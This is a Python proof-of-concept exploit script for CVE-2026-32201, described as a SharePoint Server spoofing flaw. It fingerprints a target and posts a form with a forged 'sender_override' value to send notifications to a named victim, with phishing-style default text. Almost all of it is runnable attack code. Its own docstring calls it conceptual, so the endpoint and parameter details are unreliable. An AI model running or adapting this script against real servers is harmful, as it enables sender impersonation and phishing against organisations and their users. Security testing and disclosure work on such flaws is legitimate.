#!/usr/bin/env python3
"""
CVE-2026-32201 SharePoint Server Spoofing Exploit (Conceptual PoC for Pentesting)

This script demonstrates a conceptual exploitation of CVE-2026-32201, an improper input validation
vulnerability in Microsoft SharePoint Server allowing unauthenticated network spoofing.

Usage for authorized pentest:
1. Replace TARGET_URL with vulnerable SharePoint host.
2. Customize payload for spoofed sender/content.
3. Run and check server response/logs for success indicators.
"""

import requests
import argparse
import sys
from urllib.parse import urljoin

def check_vulnerability(target_url):
    sessions = requests.Session()
    try:
        resp = sessions.get(urljoin(target_url, "/_layouts/15/start.aspx"), timeout=10)
        if "SharePoint" in resp.text and resp.status_code == 200:
            print("[+] SharePoint detected.")
            return True
        print("[-] No SharePoint response.")
        return False
    except Exception as e:
        print(f"[-] Fingerprint error: {e}")
        return False

def exploit(target_url, recipient, subject, message, spoofed_sender, endpoint="/_layouts/15/notify.aspx"):
    sessions = requests.Session()
    sessions.headers.update({
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
        "Content-Type": "application/x-www-form-urlencoded",
    })

    payload = {
        "recipient": recipient,
        "subject": subject,
        "message": message,
        "sender_override": spoofed_sender  # Vulnerable param: insufficient sanitization
    }

    exploit_url = urljoin(target_url, endpoint)
    print(f"[*] Sending spoofed request to {exploit_url}")
    print(f"[*] Spoofed sender: {spoofed_sender}")
    print(f"[*] Target recipient: {recipient}")

    try:
        resp = sessions.post(exploit_url, data=payload, timeout=15, allow_redirects=True)
        print(f"[+] Status: {resp.status_code}")
        print(f"[+] Response length: {len(resp.text)}")
        if resp.status_code == 200:
            print("[+] Potential success: Check target logs/email for spoofed content.")
            if "success" in resp.text.lower() or "sent" in resp.text.lower():
                print("[+] Spoofing confirmed via response.")
        else:
            print("[-] Server rejected request (patched or invalid endpoint?).")
        print("[*] Response snippet:", resp.text[:500])
    except requests.exceptions.RequestException as e:
        print(f"[-] Exploit error: {e}")

def main():
    parser = argparse.ArgumentParser(description="CVE-2026-32201 SharePoint Spoofing PoC")
    parser.add_argument("target", help="Target SharePoint URL (e.g., https://sharepoint.example.com)")
    parser.add_argument("--recipient", required=True, help="Victim email/recipient")
    parser.add_argument("--subject", default="Urgent Document Review", help="Notification subject")
    parser.add_argument("--message", default="Please review attached.", help="Notification body")
    parser.add_argument("--sender", required=True, help="Spoofed sender (e.g., admin@target.com)")
    parser.add_argument("--endpoint", default="/_layouts/15/notify.aspx", help="Vulnerable endpoint")
    args = parser.parse_args()

    print("CVE-2026-32201 SharePoint Spoofing Exploit")
    print("CVSS: 6.5 (AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N)")
    print("=" * 60)

    if not args.target.startswith(("http://", "https://")):
        args.target = "https://" + args.target

    if check_vulnerability(args.target):
        exploit(args.target, args.recipient, args.subject, args.message, args.sender, args.endpoint)
    else:
        sys.exit(1)

if __name__ == "__main__":
    main()